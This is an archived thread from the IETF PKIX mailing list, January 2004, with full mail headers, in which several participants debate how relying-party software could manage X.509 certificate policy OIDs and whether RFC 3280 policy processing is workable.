ESMTP id 66DA134045; Thu, 29 Jan 2004 04:59:30 +1300 (NZDT) Received: (from pgut001@localhost) by cs.auckland.ac.nz (8.11.6/8.11.6) id i0SG0GS26114; Thu, 29 Jan 2004 05:00:16 +1300 Date: Thu, 29 Jan 2004 05:00:16 +1300 Message-Id: <200401281600.i0SG0GS26114@cs.auckland.ac.nz> From: pgut001@cs.auckland.ac.nz (Peter Gutmann) To: chokhani@orionsec.com, ietf-pkix@imc.org Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> X-Virus-Scanned: by amavisd-new at avalon.net Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> "Santosh Chokhani" <chokhani@orionsec.com> writes: >It is part of ISO/IEC JTC 1/SC 06 N12345 dated Nov. 14, 2002 working draft. >David Cooper and Laura Boyer may be in better position to state the exact >status. Ahh, OK. I sorta stopped following the drafts about a year after it was supposed to have been finished (that's also why I wasn't quite sure whether the drafts you referred to are still v4 drafts or the start of the v5 drafts). The ITU web site doesn't help much either, with the main version (before the flood of corrigenda also on the site) being dated 2000 but posted 2001, so the official date for the final standard predates the working drafts I've got. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SGIQv1039579; Wed, 28 Jan 2004 08:18:26 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SGIQkJ039578; Wed, 28 Jan 2004 08:18:26 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av5-2-sn1.fre.skanova.net (av5-2-sn1.fre.skanova.net [81.228.11.112]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SGIPaF039569 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:18:25 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av5-2-sn1.fre.skanova.net (Postfix, from userid 502) id 04A8F37F40; Wed, 28 Jan 2004 17:18:20 +0100 (CET) Received: from smtp5.hy.skanova.net (smtp5.hy.skanova.net [195.67.199.134]) by av5-2-sn1.fre.skanova.net (Postfix) with ESMTP id E8EFB37F34; Wed, 28 Jan 2004 17:18:20 +0100 (CET) Received: from arport (t10o913p27.telia.com [213.64.27.147]) by smtp5.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0SGIJ7N006010; Wed, 28 Jan 2004 17:18:19 +0100 (CET) Message-ID: <03c801c3e5b9$94ece750$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Richard Levitte - VMS Whacker" <levitte@lp.se> Cc: <dcross@microsoft.com>, <ietf-pkix@imc.org> References: <3C69AE30038D9A4590F5EC20DCD41F68015F134B@RED-MSG-41.redmond.corp.microsoft.com> <002601c3e518$848b66d0$0500a8c0@arport> <20040128.164606.101603362.levitte@lp.se> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 17:12:51 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> >> Assuming that you added such support to the Windows >> trust anchor installation process, I believe you >> would run into a little problem: How is the trust >> administrator supposed to know what policy OIDs the >> CA uses? >I'm sorry, I'm not sure I understand the question. Did you mean any >other OID than what should be found in the CA certificate? There are no requirements to use policy OIDs at all, making the trust admin process rather arbitrary. Regarding those CAs who use policy OIDs, is there a MUST to also specify these at CA-level to make path-validation work? Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SGA3WB038959; Wed, 28 Jan 2004 08:10:03 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SGA3AY038957; Wed, 28 Jan 2004 08:10:03 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from nwkea-mail-1.sun.com (nwkea-mail-1.sun.com [192.18.42.13]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SGA0VZ038935 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:10:00 -0800 (PST) (envelope-from Steve.Hanna@Sun.COM) Received: from phys-bur1-1 ([129.148.13.15]) by nwkea-mail-1.sun.com (8.12.10/8.12.9) with ESMTP id i0SG9uj4001861 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:09:56 -0800 (PST) Received: from sun.com (dhcp-ubur02-75-161.East.Sun.COM [129.148.75.161]) by bur-mail2.east.sun.com (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTPA id <0HS70029XJKJ2J@bur-mail2.east.sun.com> for ietf-pkix@imc.org; Wed, 28 Jan 2004 11:09:56 -0500 (EST) Date: Wed, 28 Jan 2004 11:08:58 -0500 From: Steve Hanna <Steve.Hanna@Sun.COM> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook To: Anders Rundgren <anders.rundgren@telia.com> Cc: ietf-pkix@imc.org Message-id: <4017DE9A.988E5F3A@sun.com> MIME-version: 1.0 X-Mailer: Mozilla 4.79 [en] (WinNT; U) Content-type: multipart/signed; boundary=------------msDAB2604412BBA68F9CBDFDC7; micalg=sha1; protocol="application/x-pkcs7-signature" X-Accept-Language: en References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> <005001c3e50b$9cddac00$0500a8c0@arport> <p06020405bc3d7a1ddfed@[128.33.244.157]> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a cryptographically signed message in MIME format. --------------msDAB2604412BBA68F9CBDFDC7 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit At 20:27 +0100 1/27/04, Anders Rundgren wrote: > A "compliant management interface for the security policy > database" for X.509 would be fun to review. As far as I can > see, the X.509 policy mechanisms are flawed to the point where > it becomes technically infeasible to specify such an interface. > But I stay interested if anybody dares to challenge that statement > with something tangible instead of the usual PKI mumbo-jumbo, > like "there are many ways to do this". OK, I'll take the bait. But I'll pass on Peter Gutmann's "reward". First, let me address the implicit question "Who needs certificate policies? Why bother?" Some PKI users want to support multiple levels of assurance within a single PKI. For example, many U.S. government agencies want this. To accomplish this, they put a certificate policy extension in each certificate indicating under which policy or policies it was issued. Many PKI users (CAs and relying parties) don't need this. They can just omit all policy-related extensions from their certificates and forget about configuring their relying party software with policy-related parameters. Now, on to the matter of describing a "compliant management interface for the security policy database". Actually, David Cross already did this. He explained that the Windows Server 2003 IAS Server component allows administrators to configure the set of allowed policy OIDs. That's equivalent to the "user-initial-policy-set" described in RFC 3280. Some users might also want the ability to set the other flags specified in 3280 (like initial-policy-mapping-inhibit), but the functionality described by David is probably sufficient for most purposes. See, that wasn't so hard, was it? I admit that most users won't care about or understand these parameters. In fact, most users don't know who their trust anchors are or what the RSA algorithm is. But that's not a good argument for removing trust anchors and the RSA algorithm from standards and software. It's an argumnet for providing good default settings and good ways for administrators and power users to modify those defaults. I expect this email will set off another flurry of responses, but maybe they will be more insightful than the barrage of content-free attacks we have had so far. I can hope, can't I? ;-) Thanks, Steve --------------msDAB2604412BBA68F9CBDFDC7 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIIEAYJKoZIhvcNAQcCoIIIATCCB/0CAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC BeMwggKjMIICDKADAgECAgMKVAgwDQYJKoZIhvcNAQEEBQAwgZIxCzAJBgNVBAYTAlpBMRUw EwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhh d3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwg RnJlZW1haWwgUlNBIDIwMDAuOC4zMDAeFw0wMzA3MTExMTAxNTFaFw0wNDA3MTAxMTAxNTFa MGgxDjAMBgNVBAQTBUhhbm5hMRUwEwYDVQQqEwxTdGVwaGVuIFJvc3MxGzAZBgNVBAMTElN0 ZXBoZW4gUm9zcyBIYW5uYTEiMCAGCSqGSIb3DQEJARYTc3RldmUuaGFubmFAc3VuLmNvbTCB nzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAoxRk/abMPe7Km2EqpD2FZXzjiBGUHhIdNlIO 9W6mdCQro1xMc+sv+93UuVnIzse+XA67Tqx4g5FdoQ+PI8TQYemYSkTD9GitgU563ypu03UV 86zTJA7u9zVkNv/qL2LRKZ9BXy2Smtet+PUh3nYjMh/ZY7LQxQzmdu1Zunue+yECAwEAAaMw MC4wHgYDVR0RBBcwFYETc3RldmUuaGFubmFAc3VuLmNvbTAMBgNVHRMBAf8EAjAAMA0GCSqG SIb3DQEBBAUAA4GBAHbpX0TKiOFu1vxKc3nAOcUHwoci5kinboYrnjWcl37mMXXbBFntaYRM 9LxpGtHdPm7F4pAviKp8bnFzTU46OyUw3kNUAVGDeWYVQC76f0dDZdA313Tn88UZYa+N6O8W bO8wjKA2vg+yx79WXJCFDu+TpsG/28NKPdH42w8LEOVHMIIDODCCAqGgAwIBAgIQZkVyt8x0 9c9jdkWE0C6RATANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3Vs dGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UE AxMbVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25h bC1mcmVlbWFpbEB0aGF3dGUuY29tMB4XDTAwMDgzMDAwMDAwMFoXDTA0MDgyNzIzNTk1OVow gZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUg VG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEo MCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMDCBnzANBgkqhkiG9w0B AQEFAAOBjQAwgYkCgYEA3jMypmPHCSVFPtJueCdngcXaiBmClw7jRCmKYzUqbXA8+tyu9+50 bzC8M5B/+TRxoKNtmPHDT6Jl2w36S/HW3WGl+YXNVZo1Gp2Sdagnrthy+boC9tewkd4c6avg GAOofENCUFGHgzzwObSbVIoTh/+zm51JZgAtCYnslGvpoWkCAwEAAaNOMEwwKQYDVR0RBCIw IKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDEtMjk3MBIGA1UdEwEB/wQIMAYBAf8CAQAw CwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBBAUAA4GBADGxS0dd+QFx5fVTbF151j2YwCYTYoEi pxL4IpXoG0m3J3sEObr85vIk65H6vewNKjj3UFWobPcNrUwbvAP0teuiR59sogxYjTFCCRFs sBpp0SsSskBdavl50OouJd2K5PzbDR+dAvNa28o89kTqJmmHf0iezqWf54TYyWJirQXGMYIB 9TCCAfECAQEwgZowgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQ BgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0 ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMAID ClQIMAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B CQUxDxcNMDQwMTI4MTYwODU4WjAjBgkqhkiG9w0BCQQxFgQU9qiXouLfWTEE0YI5Csh/vMxY zSwwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwBwYFKw4D AgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEgYChFw3M XV53ceX/PsVis+tV0cWsgl4MrtOL4WVYURx3C1s8mY696PuNV0k4JJMrnG0ILZXbz4xozJvl 9osdCqSVV1TXhfcqYUFIMm5QUYO6LrPXzG+F1K1fzMxUDma+168kRtYAIddIbc4l1diudMyf sg/xpwSIz4Fi1nf901hJfg== --------------msDAB2604412BBA68F9CBDFDC7-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SG0MP0038335; Wed, 28 Jan 2004 08:00:22 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SG0MIG038334; Wed, 28 Jan 2004 08:00:22 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp.cs.auckland.ac.nz (smtp.cs.auckland.ac.nz [130.216.33.151]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SG0KCC038326 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:00:20 -0800 (PST) (envelope-from pgut001@cs.auckland.ac.nz) Received: from cs.auckland.ac.nz (medusa01.cs.auckland.ac.nz [130.216.34.33]) by smtp.cs.auckland.ac.nz (Postfix) with ESMTP id 66DA134045; Thu, 29 Jan 2004 04:59:30 +1300 (NZDT) Received: (from pgut001@localhost) by cs.auckland.ac.nz (8.11.6/8.11.6) id i0SG0GS26114; Thu, 29 Jan 2004 05:00:16 +1300 Date: Thu, 29 Jan 2004 05:00:16 +1300 Message-Id: <200401281600.i0SG0GS26114@cs.auckland.ac.nz> From: pgut001@cs.auckland.ac.nz (Peter Gutmann) To: chokhani@orionsec.com, ietf-pkix@imc.org Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> "Santosh Chokhani" <chokhani@orionsec.com> writes: >It is part of ISO/IEC JTC 1/SC 06 N12345 dated Nov. 14, 2002 working draft. >David Cooper and Laura Boyer may be in better position to state the exact >status. Ahh, OK. I sorta stopped following the drafts about a year after it was supposed to have been finished (that's also why I wasn't quite sure whether the drafts you referred to are still v4 drafts or the start of the v5 drafts). The ITU web site doesn't help much either, with the main version (before the flood of corrigenda also on the site) being dated 2000 but posted 2001, so the official date for the final standard predates the working drafts I've got. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SFltZt037565; Wed, 28 Jan 2004 07:47:55 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SFltbl037564; Wed, 28 Jan 2004 07:47:55 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from nic.lp.se (nic.lp.se [213.212.3.208]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SFlr8E037552 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 07:47:53 -0800 (PST) (envelope-from levitte@lp.se) Received: from localhost (127.0.0.1) by nic.lp.se (MX V5.3 VnHj) with ESMTP; Wed, 28 Jan 2004 16:46:20 +0100 Date: Wed, 28 Jan 2004 16:46:06 +0100 (CET) Message-ID: <20040128.164606.101603362.levitte@lp.se> To: anders.rundgren@telia.com CC: dcross@microsoft.com, ietf-pkix@imc.org Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook From: Richard Levitte - VMS Whacker <levitte@lp.se> In-Reply-To: <002601c3e518$848b66d0$0500a8c0@arport> References: <3C69AE30038D9A4590F5EC20DCD41F68015F134B@RED-MSG-41.redmond.corp.microsoft.com> <002601c3e518$848b66d0$0500a8c0@arport> X-URL: http://www.lp.se/ X-Waved: dead chicken, GNU emacs 21.3.1, Mew version 4.0.63 X-Mew: See http://www.mew.org/ X-Mailer: Mew version 4.0.63 on Emacs 21.3.1 / Mule 5.0 (SAKAKI) MIME-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> In message <002601c3e518$848b66d0$0500a8c0@arport> on Tue, 27 Jan 2004 21:59:55 +0100, "Anders Rundgren" <anders.rundgren@telia.com> said: anders.rundgren> Assuming that you added such support to the Windows anders.rundgren> trust anchor installation process, I believe you anders.rundgren> would run into a little problem: How is the trust anders.rundgren> administrator supposed to know what policy OIDs the anders.rundgren> CA uses? I'm sorry, I'm not sure I understand the question. Did you mean any other OID than what should be found in the CA certificate? ----- Please consider sponsoring my work on free software. See http://www.free.lp.se/sponsoring.html for details. -- Richard Levitte | http://richard.levitte.org/ | Tunnlandsv. 3 Levitte Programming | http://www.lp.se/ | S-168 36 Bromma T: +46-708-26 53 44 | | SWEDEN "Price, performance, quality... choose the two you like" Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SFafxW036834; Wed, 28 Jan 2004 07:36:41 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SFafb0036833; Wed, 28 Jan 2004 07:36:41 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av3-2-sn1.fre.skanova.net (av3-2-sn1.fre.skanova.net [81.228.11.110]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SFaenF036823 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 07:36:40 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av3-2-sn1.fre.skanova.net (Postfix, from userid 502) id 4EB7B37ED8; Wed, 28 Jan 2004 16:36:36 +0100 (CET) Received: from smtp5.hy.skanova.net (smtp5.hy.skanova.net [195.67.199.134]) by av3-2-sn1.fre.skanova.net (Postfix) with ESMTP id 3F02B37E55; Wed, 28 Jan 2004 16:36:36 +0100 (CET) Received: from arport (t9o913p72.telia.com [213.64.27.72]) by smtp5.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0SFaY7N013923; Wed, 28 Jan 2004 16:36:35 +0100 (CET) Message-ID: <038601c3e5b3$bfd3eeb0$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Santosh Chokhani" <chokhani@orionsec.com>, <ietf-pkix@imc.org> References: <01af01c3e596$15c34640$e82b4d0c@hq.orionsec.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 16:31:06 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Santosh, Instead of going for the profound aspects of PKI, you can start at the "newbe" level by answering some simple questions like - How does an RP "trust admin" know what policies a CA support? - If policy settings would be implemented in core systems like CryptoAPI, Java Keystore, CryptLib etc. would that not require that these trust store system would be revised in order to also house policy setting data? Anders ----- Original Message ----- From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Sent: Wednesday, January 28, 2004 12:58 Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Peter: I do not if your reward is punishment or reward, if you speak in plain American English (pardon the parochialism) or Hindi will be glad to tell you how the application can be configured for policy processing or the application can provide the user interface. I also encourage you to read Annex J of X.509 draft. -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Gutmann Sent: Tuesday, January 27, 2004 7:29 PM To: anders.rundgren@telia.com; kent@bbn.com Cc: ietf-pkix@imc.org Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Stephen Kent <kent@bbn.com> writes: >>Borrowing from your IPsec complaints: >>A "compliant management interface for the security policy database" >>for X.509 would be fun to review. As far as I can see, the X.509 >>policy mechanisms are flawed to the point where it becomes technically >>infeasible to specify such an interface. But I stay interested if >>anybody dares to challenge that statement with something tangible >>instead of the usual PKI mumbo-jumbo, like "there are many ways to do >>this". > >A challenge with no apparent reward to motivate a response, as usual >... I hereby offer a reward of one (1) bilabial fricative to anyone who can provide a clear technical explanation/description of a policy management interface for X.509, to be paid in full upon delivery of said explanation/description. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SExUWD034650; Wed, 28 Jan 2004 06:59:30 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SExU3I034649; Wed, 28 Jan 2004 06:59:30 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from host13.websitesource.com (host13.websitesource.com [209.239.35.152]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SExRZD034639 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 06:59:30 -0800 (PST) (envelope-from chokhani@orionsec.com) Received: from wchokhani (dpvc-138-88-161-20.res.east.verizon.net [138.88.161.20]) by host13.websitesource.com (8.12.10/8.12.10) with ESMTP id i0SExPh2029786 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 09:59:25 -0500 From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 09:59:14 -0500 Message-ID: <01f701c3e5af$4ea99540$e82b4d0c@hq.orionsec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 In-Reply-To: <200401281331.i0SDVh325275@cs.auckland.ac.nz> Importance: Normal Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0SExUZD034644 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Peter: It is part of ISO/IEC JTC 1/SC 06 N12345 dated Nov. 14, 2002 working draft. David Cooper and Laura Boyer may be in better position to state the exact status. -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Gutmann Sent: Wednesday, January 28, 2004 8:32 AM To: chokhani@orionsec.com; ietf-pkix@imc.org Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook "Santosh Chokhani" <chokhani@orionsec.com> writes: >I do not if your reward is punishment or reward, Well it'll certainly be pretty rewarding for anyone watching. >I also encourage you to read Annex J of X.509 draft. Hmm, it's not in any draft I have, is that the eternal-draft fourth edition, or has X.509 skipped the middleman and jumped straight from 4th edition drafts into 5th edition drafts? Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEsSwv034327; Wed, 28 Jan 2004 06:54:28 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SEsSlo034326; Wed, 28 Jan 2004 06:54:28 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com (aragorn.bbn.com [128.33.0.62]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEsQTC034316 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 06:54:26 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.33.244.157] (col-dhcp33-244-157.bbn.com [128.33.244.157]) by aragorn.bbn.com (8.12.7/8.12.7) with ESMTP id i0SEsLM9010544; Wed, 28 Jan 2004 09:54:22 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p06020405bc3d7a1ddfed@[128.33.244.157]> In-Reply-To: <005001c3e50b$9cddac00$0500a8c0@arport> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> <005001c3e50b$9cddac00$0500a8c0@arport> Date: Wed, 28 Jan 2004 09:54:10 -0500 To: "Anders Rundgren" <anders.rundgren@telia.com> From: Stephen Kent <kent@bbn.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: <ietf-pkix@imc.org> Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> At 20:27 +0100 1/27/04, Anders Rundgren wrote: > >>A "compliant management interface for the security policy database" >>>for X.509 would be fun to review. As far as I can see, the X.509 >>>policy mechanisms are flawed to the point where it becomes technically >>>infeasible to specify such an interface. But I stay interested if anybody >>>dares to challenge that statement with something tangible instead of >>>the usual PKI mumbo-jumbo, like "there are many ways to do this". > >>A challenge with no apparent reward to motivate a response, as usual ... > >May I help you with some analysis? you can try, but experience suggests otherwise :-) >PKI projects historically started with the CA, and this has influenced >some PKI standards as well, the RFC3280 policy support is a prime >example of that. successful PKI projects start with a problem that needs to be solved. >However, being a CA, is being an "information producer" which is >considerably easier than being an "information consumer" as only the >latter has to "interpret" and maybe "act" upon what the information >producer says. > >If the designers of the policy system instead had focused on the relying >party (the "information consumer"), they had probably realized that a >relying party consists of 1) the relying party software 2) the people >depending on the relying party software. > >Further analysis shows that the "people" category, except in the most >trivial scenarios, consists of "trust administrators" and "end users". >In the background there are also some legal folks lurking around. warning, neologism alert! "trust administrator" is a nonsense term created to obfuscate technical issues. >If you then apply the design constraint that all these entities should >have the best possible system adapted for the entities' actual tasks >and competence, you would end-up with a very different policy scheme. any time someone suggests that a system should be "optimized" for multiple entities who may have conflicting goals, we ought to be wary. >Commercial CAs know that, and therefore with few exceptions, continue >to ignore a system that was not designed with the "customer in mind". commercial CAs often optimize their profit. to the exclusion of all else. whether that is achieved by doing the best job for their clients is hard to say, since we have an effective monopoly in the commercial CA business, in most respects. this is like saying that the software with the biggest market share is that which is best for its users. >The major difference is that policy in commercial CAs is associated >with the CA, eliminating the need for moving trust processing and >trust administration tasks into the application and user domains >respectively. This enables the creation of shrink-wrap RP software >as well as shielding end-users from too close encounters with PKI. you often use the phrase "shrink wrap RP software" but never seem to be able to provide a non-marketing characterization. and, the appearance of "trust administration" here again sets off the neologism alert. >This also allows trust admins to anytime, using "CA properties", >view what "they actually currently trust", without having a single >EE certificate! alert, alert, ... Steve Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEkpf7033591; Wed, 28 Jan 2004 06:46:51 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SEkpWl033590; Wed, 28 Jan 2004 06:46:51 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com (aragorn.bbn.com [128.33.0.62]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEkmxj033577 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 06:46:50 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.33.244.157] (col-dhcp33-244-157.bbn.com [128.33.244.157]) by aragorn.bbn.com 